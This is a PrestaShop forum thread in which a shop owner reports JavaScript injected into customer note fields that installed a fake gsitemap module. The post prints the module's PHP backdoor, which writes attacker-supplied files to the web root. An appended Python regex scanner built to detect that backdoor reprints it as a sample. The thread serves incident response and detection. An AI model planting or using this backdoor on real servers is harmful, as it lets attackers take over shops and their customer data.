ZhabaKwa Posted December 14, 2023 (edited)

Recently, after trying to change the status of some orders, I started getting PrestaShop errors. After deeper investigation it appeared that some customers' note fields had been updated with strange JavaScript. Unfortunately I can't insert the full code as the forum won't let me. When I tried to decode the variable ff, it decoded to a base64 ZIP archive with a gsitemap module. For now I have disabled this module and cleared these customer fields directly in the DB, to see whether it appears again or not. Has anybody experienced such an issue with Presta? What's the correct way to fix things?

PS: Running version 1.6.1.23. The site is behind CloudFlare.

ZhabaKwa (Author) Posted December 16, 2023

Further investigation showed this was an injection of a fake gsitemap module via JavaScript, which was successfully installed. gsitemap-cron.php of the injected module contained the following backdoor, which lets it save any file to your server's DOCUMENT_ROOT:

/* Check to security tocken */
if(md5($_POST["key"])=='xxxxxxxxx'){
    file_put_contents($_SERVER['DOCUMENT_ROOT'].base64_decode($_POST['n']),base64_decode($_POST['d']),FILE_APPEND);
    print_r(md5('999999999999666666633333311111111'));
}

In my case a search for modified files showed nothing was changed, though this backdoored module was installed quite long ago. I don't know exactly how the code was injected, but I noticed too many abandoned carts starting from the end of summer. From that time this JavaScript started to appear in the database.
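
A file-level check for the backdoor shape quoted in the post above, as an added example that is not part of the original thread or of PrestaShop: it flags PHP files where request data is base64-decoded, written to disk, or used in an md5 key comparison. The rule names, the regexes and the benign sample are this example's own constructions; the backdoor sample is copied from the post.

```python
import re
from pathlib import Path

# Request superglobals an attacker controls ($_SERVER is deliberately excluded).
REQ = r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\["

# Heuristic rules (assumptions of this example), each matching one trait of the
# quoted backdoor. [^;]* keeps a match inside a single PHP statement.
RULES = {
    "request-data-to-file-write": re.compile(
        r"file_put_contents\s*\([^;]*?" + REQ, re.I | re.S),
    "md5-request-key-gate": re.compile(
        r"md5\s*\(\s*" + REQ + r"[^)]*\)\s*={2,3}", re.I),
    "base64-decoded-request-data": re.compile(
        r"base64_decode\s*\(\s*" + REQ, re.I),
}

# Backdoor body as quoted in the post (key hash already redacted there).
BACKDOOR_FROM_POST = r'''<?php /* Check to security tocken */
if(md5($_POST["key"])=='xxxxxxxxx'){file_put_contents($_SERVER['DOCUMENT_ROOT'].base64_decode($_POST['n']),base64_decode($_POST['d']),FILE_APPEND);print_r(md5('999999999999666666633333311111111'));}'''

# Constructed benign sample: reads a request value, writes a fixed file.
BENIGN_CONSTRUCTED = r'''<?php
$page = (int)$_POST['page'];
file_put_contents(dirname(__FILE__).'/sitemap.xml', $xml);'''


def scan_source(src):
    """Return the names of all rules that match one PHP source string."""
    return [name for name, rx in RULES.items() if rx.search(src)]


def scan_tree(root):
    """Scan every *.php file under root; return {path: [rule names]} for hits."""
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    import sys
    # Usage: python scan.py /path/to/shop/modules
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, ", ".join(hits))
```

A hit is a lead for manual review, not a verdict: legitimate modules can match a single rule, while all three together in one file match the sample from the post.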